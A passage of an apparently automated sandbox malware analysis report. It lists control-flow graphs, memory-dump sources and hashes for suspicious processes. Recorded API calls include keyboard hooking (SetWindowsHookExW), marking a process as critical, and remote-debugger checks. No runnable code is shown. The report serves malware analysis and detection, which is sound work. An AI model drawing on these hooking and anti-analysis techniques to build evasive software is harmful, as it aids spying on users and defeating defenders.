                                                                                                                • Instruction ID: 7fa090dcf4e7db02d8ba7367f16034df5d0422a1daebeabca738e0212c6c0032
                                                                                                                • Opcode Fuzzy Hash: c581811641039e020e5e735742808af5e513c56791bfcd2a855c58f7d1800576
                                                                                                                • Instruction Fuzzy Hash: 8E31C630A1CA494FDB58EB68D8466F9BBE1FB59321F00427ED05ED3192CA64B812CB81

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 652 7ff887d28e20-7ff887d28e27 653 7ff887d28e29-7ff887d28e32 652->653 654 7ff887d28df6-7ff887d28e27 653->654 655 7ff887d28e34-7ff887d29afd 653->655 654->653 663 7ff887d29b89-7ff887d29b8d 655->663 664 7ff887d29b03-7ff887d29b10 655->664 665 7ff887d29b12-7ff887d29b4f SetWindowsHookExW 663->665 664->665 667 7ff887d29b51 665->667 668 7ff887d29b57-7ff887d29b88 665->668 667->668
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.2672992531.00007FF887D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ff887d20000_adawsfaefasfasfg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 048a4d91a85386b65faf84d113e7dab34600ec4760398e2ec21d6c38e40672db
                                                                                                                • Instruction ID: a67d746b46c1f0cad64490b5660af46bfae88311f11386da310ee276fd0f1949
                                                                                                                • Opcode Fuzzy Hash: 048a4d91a85386b65faf84d113e7dab34600ec4760398e2ec21d6c38e40672db
                                                                                                                • Instruction Fuzzy Hash: 8831D570A1CA598FDB58EB5CD8467BDBBE1FB69321F10427ED00ED3196CA64B802C781

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:12
                                                                                                                Total number of Limit Nodes:0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 569 7ff887d184ad-7ff887d18590 RtlSetProcessIsCritical 572 7ff887d18598-7ff887d185cd 569->572 573 7ff887d18592 569->573 573->572
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2695349919-0
                                                                                                                • Opcode ID: 36e5c4065cb797dae9dfc7303142166707538742a91f0f5e0f7493b1b482c18c
                                                                                                                • Instruction ID: 24cb53c228762efecee423ae9f3105350d93df723bd0d6c3487134719d5f69d7
                                                                                                                • Opcode Fuzzy Hash: 36e5c4065cb797dae9dfc7303142166707538742a91f0f5e0f7493b1b482c18c
                                                                                                                • Instruction Fuzzy Hash: 8541F53190C6498FDB18DF98D849BE9BBF0FF56311F04416EE09AC3692CB786846CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 575 7ff887d19228-7ff887d1922f 576 7ff887d1923a-7ff887d192ad 575->576 577 7ff887d19231-7ff887d19239 575->577 581 7ff887d19339-7ff887d1933d 576->581 582 7ff887d192b3-7ff887d192c0 576->582 577->576 583 7ff887d192c2-7ff887d192ff SetWindowsHookExW 581->583 582->583 585 7ff887d19301 583->585 586 7ff887d19307-7ff887d19338 583->586 585->586
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HookWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2559412058-0
                                                                                                                • Opcode ID: 60f2ea27d76a7cc96114ad184c9722d212ffeedc9781071558e5d33a1d48f786
                                                                                                                • Instruction ID: 6011b70b535bf3dacdbb2a6d513ba3be38fb637d26339b7b4eaeb093bc530a86
                                                                                                                • Opcode Fuzzy Hash: 60f2ea27d76a7cc96114ad184c9722d212ffeedc9781071558e5d33a1d48f786
                                                                                                                • Instruction Fuzzy Hash: DD41F830A4CA4D8FDB58DB58D8066FDBBE1FB69321F04027ED04EC3292CE64A812C781

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 589 7ff887d169f1-7ff887d16aad CheckRemoteDebuggerPresent 593 7ff887d16aaf 589->593 594 7ff887d16ab5-7ff887d16af8 589->594 593->594
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                • String ID:
                                                                                                                • API String ID: 3662101638-0
                                                                                                                • Opcode ID: 1abba9abb04bc6c9865a034acc7af7f01934c14cdc86d274030f8c26d90de500
                                                                                                                • Instruction ID: 1c03dffd535f264849a025da7001d53f71f693057df1f9b7264ff0cc7f831e87
                                                                                                                • Opcode Fuzzy Hash: 1abba9abb04bc6c9865a034acc7af7f01934c14cdc86d274030f8c26d90de500
                                                                                                                • Instruction Fuzzy Hash: 9231F23190861C8FCB58DF98C84A7ED7BE0FF65321F05426AD48AD7252DB74A846CB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 596 7ff887d11f93-7ff887d16aad CheckRemoteDebuggerPresent 600 7ff887d16aaf 596->600 601 7ff887d16ab5-7ff887d16af8 596->601 600->601
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.2694391367.00007FF887D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_7ff887d10000_wasdwasfwasfs.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                                                • String ID:
                                                                                                                • API String ID: 3662101638-0
                                                                                                                • Opcode ID: 93a1328a105ddc487b7218be7d2496cdf8a93b5375629c3cdbf88989e9964fef
                                                                                                                • Instruction ID: 57b5bbcb9074f5db6d82ace146d2729395554e09f0762a4595f9620169456070
                                                                                                                • Opcode Fuzzy Hash: 93a1328a105ddc487b7218be7d2496cdf8a93b5375629c3cdbf88989e9964fef
                                                                                                                • Instruction Fuzzy Hash: 2C31C47190861C8FDB58DF98C44A7FDBBE0FF55311F14426AD48AD3242CB74A856CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (7 r
                                                                                                                • API String ID: 0-1315544938
                                                                                                                • Opcode ID: 848a00c55eb16b25b5da8f8fd8550586cb2c1dedf0235bd48315687d6bef9bcb
                                                                                                                • Instruction ID: e17d02b20027a19f5426e91a6b97f785a303dbaf9bd99bfb0b1d018422b6ec13
                                                                                                                • Opcode Fuzzy Hash: 848a00c55eb16b25b5da8f8fd8550586cb2c1dedf0235bd48315687d6bef9bcb
                                                                                                                • Instruction Fuzzy Hash: 5A821322D4D78A8FE3A6862858561B83FF1FF57AA1B0901FBC04DC7593D91CAC46C362
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: X7 r
                                                                                                                • API String ID: 0-626409462
                                                                                                                • Opcode ID: 3bd327678016b9d9882ece08e9ab4d430ef4ae390970459bdc2995b67b092cd8
                                                                                                                • Instruction ID: b041677be37cc625724611568a94a23cfb6cbbba4029438fa750b91b54a19d7e
                                                                                                                • Opcode Fuzzy Hash: 3bd327678016b9d9882ece08e9ab4d430ef4ae390970459bdc2995b67b092cd8
                                                                                                                • Instruction Fuzzy Hash: 2FD14531D4DA8A8FE7A69B6858165BD7BF1FF067A1B0801FAD44DCB093DE1C9805C362
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b511cff8f92ee770b98dba7da3ee3cdc54d4c8111147587741f935f6435661d0
                                                                                                                • Instruction ID: d2c18e98e8e026de18c8104a8a25d96f8892a8ea22298eea73e38e3cb1651929
                                                                                                                • Opcode Fuzzy Hash: b511cff8f92ee770b98dba7da3ee3cdc54d4c8111147587741f935f6435661d0
                                                                                                                • Instruction Fuzzy Hash: D711517658E7C54FD793872488691983FB0FF63154B0D01EBD489CB0A7D6194809C792
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d87b90bd1888a07cc620c709567de50382f70628bea04fe13de3b80a8892be22
                                                                                                                • Instruction ID: 9aa2336df789c4a2590dcf633ec011036d0612657aabdd926d1cea9eb42116ec
                                                                                                                • Opcode Fuzzy Hash: d87b90bd1888a07cc620c709567de50382f70628bea04fe13de3b80a8892be22
                                                                                                                • Instruction Fuzzy Hash: 97412D31D1CA888FE75CAF5CA80A6BDBBE0FB55710F14426FE04993292DA64A815C7C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1502914983.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887c2d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd8a66a5875189918cef00991cab2ddd5ea33322f24f3841cc5de77310f58824
                                                                                                                • Instruction ID: 1ac27e859c36554e15fc156d3d2f00e3461ff6f801ced6248e20a1c659fac513
                                                                                                                • Opcode Fuzzy Hash: fd8a66a5875189918cef00991cab2ddd5ea33322f24f3841cc5de77310f58824
                                                                                                                • Instruction Fuzzy Hash: 3B41007080DBC44FE756DB38D8499A63FB1EF52361B1506EFE08CCB1A3D625A806C792
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1503925908.00007FF887D49000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D49000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887d49000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0dc994c719262f5ded9f884423d6d04ad80d4892097f64cb36119d17645e6a3b
                                                                                                                • Instruction ID: 105f1a4c8712f02379d7a69a96d3f640978dbefa08d8ee51ec84b9b777abfa6b
                                                                                                                • Opcode Fuzzy Hash: 0dc994c719262f5ded9f884423d6d04ad80d4892097f64cb36119d17645e6a3b
                                                                                                                • Instruction Fuzzy Hash: 2821F33090CB8C4FDB59DBACD84A7E97FF0EB96320F04426BD049C7156DA74A45ACB92
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6ce6459f53e6a007c9fbc153650b4c766d253d4a22abff17ff9c11f9c8cfdb19
                                                                                                                • Instruction ID: 6339983da0dd799c9fc604142b3de2e9177fe44f2520dc60ec3c20795f1a9785
                                                                                                                • Opcode Fuzzy Hash: 6ce6459f53e6a007c9fbc153650b4c766d253d4a22abff17ff9c11f9c8cfdb19
                                                                                                                • Instruction Fuzzy Hash: C821C532E4DA878FF3E5DB1C945217867E2FF56A92B6A01BAC00EC7692DE1CDC44C251
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1505472026.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec89fe8dd66a9ef4cf3e9d721e3b301901d9c587ef7d17d1b8e7e238074f3e40
                                                                                                                • Instruction ID: fec7c0c18b9ca98ff984045013f728eedcea9c6c66292edeb64d6f0792399548
                                                                                                                • Opcode Fuzzy Hash: ec89fe8dd66a9ef4cf3e9d721e3b301901d9c587ef7d17d1b8e7e238074f3e40
                                                                                                                • Instruction Fuzzy Hash: D6110232D4D6858FE7E5E72894525BC77F1FF42AA275900BAC01DC7A97DA1DAC00C3A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1503925908.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1503925908.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0_$8,_$P/_$p0_$-_$/_
                                                                                                                • API String ID: 0-2711177198
                                                                                                                • Opcode ID: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
                                                                                                                • Instruction ID: bd8335d587f6662f7f5c0b5c1a1a60cfb467673c65fc502ca9d33306254b1997
                                                                                                                • Opcode Fuzzy Hash: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
                                                                                                                • Instruction Fuzzy Hash: D231AA52D8E6C24FE39786B8AC2507C7FB1BF12690B5905FBC09D8B0DBD9089D48C362
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a22aa7649b595a7bc8c827840c5aed8d737ad4dc246a2f59b912c28708a1c5b7
                                                                                                                • Instruction ID: c468c38c14e0b96764d013d319dd3023f45754c8bac260b551b2647f41ebb76b
                                                                                                                • Opcode Fuzzy Hash: a22aa7649b595a7bc8c827840c5aed8d737ad4dc246a2f59b912c28708a1c5b7
                                                                                                                • Instruction Fuzzy Hash: 17C10431D4DA8A8FE7A69B6858165BD7BF1FF46B91B0401BED40DCB093DE1C9805C361
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bc2e58f67854394bf6ca07632fd923b1744b6be0f4390b9eaf44dbea5234fe79
                                                                                                                • Instruction ID: 050c44e828c5abd4e0d14e41450e16b9608bf0af3cf3c600bdf850e1218d3e77
                                                                                                                • Opcode Fuzzy Hash: bc2e58f67854394bf6ca07632fd923b1744b6be0f4390b9eaf44dbea5234fe79
                                                                                                                • Instruction Fuzzy Hash: 3F71EA73D8CAC64FE342967CD85A0ED3BB0FF62298B0C01B7C5898B097EA155916C796
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f736fbb7bfbfeee479b4e39eb1b139b8165474459d69d16f2e12fc951fdc577c
                                                                                                                • Instruction ID: 8614d7c5f742d7935dd1e154154122ef9a6f58d8942dcbc3ef036d854c9deddc
                                                                                                                • Opcode Fuzzy Hash: f736fbb7bfbfeee479b4e39eb1b139b8165474459d69d16f2e12fc951fdc577c
                                                                                                                • Instruction Fuzzy Hash: 5B612931A8CA854FE34ADB28CC954687BF0FF96354B1802BEC08ACB1D7EE15A807C755
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 44e3234deaef30495aa51aad0e972e41556c091ba4b321c445a58a4516af7803
                                                                                                                • Instruction ID: c24520bdc0eaddb2d43101b46c9f7502a8cbf4c85fe4bb11e558aeea71ba9f96
                                                                                                                • Opcode Fuzzy Hash: 44e3234deaef30495aa51aad0e972e41556c091ba4b321c445a58a4516af7803
                                                                                                                • Instruction Fuzzy Hash: FE510832F4CA868FE7D9DA2C941267877E2FF56A51B2901BAC00EC7693DD18EC05C351
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f570bfc50db885c4e0a810bdc23302b418ecf5b3e868a4b6204e9ac9f488c697
                                                                                                                • Instruction ID: 809227ff35fba70ccc8ef33594b71d915f494b447349e9cba117fabfde8ffebb
                                                                                                                • Opcode Fuzzy Hash: f570bfc50db885c4e0a810bdc23302b418ecf5b3e868a4b6204e9ac9f488c697
                                                                                                                • Instruction Fuzzy Hash: AF411932E4DA858FE7E5D66894126BC77F1FF46BA1B0801BAC05DC7683E91CAC11C391
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7061b478dd6d16766e2b8abb1ff96b60dc5be256f02d61c338bb4fef4ddbd2ca
                                                                                                                • Instruction ID: 9aa2336df789c4a2590dcf633ec011036d0612657aabdd926d1cea9eb42116ec
                                                                                                                • Opcode Fuzzy Hash: 7061b478dd6d16766e2b8abb1ff96b60dc5be256f02d61c338bb4fef4ddbd2ca
                                                                                                                • Instruction Fuzzy Hash: 97412D31D1CA888FE75CAF5CA80A6BDBBE0FB55710F14426FE04993292DA64A815C7C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0721b76a3b23963b72c86a6a268c3f25ec673e32066a0f1ad54339157af933bc
                                                                                                                • Instruction ID: 2c13bcd06351cbcf3990d706f399af196cd0822e8183d7ae462baa97db9b878c
                                                                                                                • Opcode Fuzzy Hash: 0721b76a3b23963b72c86a6a268c3f25ec673e32066a0f1ad54339157af933bc
                                                                                                                • Instruction Fuzzy Hash: DA41CB63D8DAC24FF352963898191ED7FB0FF52784B1801BBD0899B0DBE9155805D786
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1500230802.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887c2d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9b9f5ac2aec558bf350c703070db1b9aa9c4fddcce51fc19977589babc4d6469
                                                                                                                • Instruction ID: f2ab4648065575f1e50a250176062e6217c7131569cb8b94984e33e92eaace8d
                                                                                                                • Opcode Fuzzy Hash: 9b9f5ac2aec558bf350c703070db1b9aa9c4fddcce51fc19977589babc4d6469
                                                                                                                • Instruction Fuzzy Hash: 7641E27180DBC44FE756CB38D8599623FB1EF52361B1506EFE08CCB1A3D625A846C792
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9aac9915347948bc8512190acf9493281f0a38834be82b1ead4e0ed2546ae780
                                                                                                                • Instruction ID: 412d82b7fbfafe904317511d8283ca7c06fb59cab9a0f59560f5029a3389fc18
                                                                                                                • Opcode Fuzzy Hash: 9aac9915347948bc8512190acf9493281f0a38834be82b1ead4e0ed2546ae780
                                                                                                                • Instruction Fuzzy Hash: 0B31F83194DB8C4FDB59DB6898496E97FF0FBA6320F0441AFC049C7153D6645816CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78dde0ac33839a19c4f253c1ad83119cd1359f18905ca37fa0daeb574a075b60
                                                                                                                • Instruction ID: 6339983da0dd799c9fc604142b3de2e9177fe44f2520dc60ec3c20795f1a9785
                                                                                                                • Opcode Fuzzy Hash: 78dde0ac33839a19c4f253c1ad83119cd1359f18905ca37fa0daeb574a075b60
                                                                                                                • Instruction Fuzzy Hash: C821C532E4DA878FF3E5DB1C945217867E2FF56A92B6A01BAC00EC7692DE1CDC44C251
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1502636626.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0c80a1b3883349ce1aa832d62ea971da197031a2da00d683fd5621912a7940b2
                                                                                                                • Instruction ID: fec7c0c18b9ca98ff984045013f728eedcea9c6c66292edeb64d6f0792399548
                                                                                                                • Opcode Fuzzy Hash: 0c80a1b3883349ce1aa832d62ea971da197031a2da00d683fd5621912a7940b2
                                                                                                                • Instruction Fuzzy Hash: D6110232D4D6858FE7E5E72894525BC77F1FF42AA275900BAC01DC7A97DA1DAC00C3A1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22ba449f96131b08f1a106abddddf57f266012c6e72958248a516b0458695910
                                                                                                                • Instruction ID: 5627f4086be4663e499d81e0ce649bf45fbe7c2dd84d75cb1271040c1b86a126
                                                                                                                • Opcode Fuzzy Hash: 22ba449f96131b08f1a106abddddf57f266012c6e72958248a516b0458695910
                                                                                                                • Instruction Fuzzy Hash: 40E0CD2028C6864FD345926CE0507FD7691AF85350F58157DF4DE87387C64D54419352
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0_$8,_$P/_$p0_$-_$/_
                                                                                                                • API String ID: 0-2711177198
                                                                                                                • Opcode ID: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
                                                                                                                • Instruction ID: bd8335d587f6662f7f5c0b5c1a1a60cfb467673c65fc502ca9d33306254b1997
                                                                                                                • Opcode Fuzzy Hash: a4940db7fe28cad06e535787576596df12a8a713b67c87510c6e6547dc831a6e
                                                                                                                • Instruction Fuzzy Hash: D231AA52D8E6C24FE39786B8AC2507C7FB1BF12690B5905FBC09D8B0DBD9089D48C362
                                                                                                                Strings
                                                                                                                Memory Dump Source
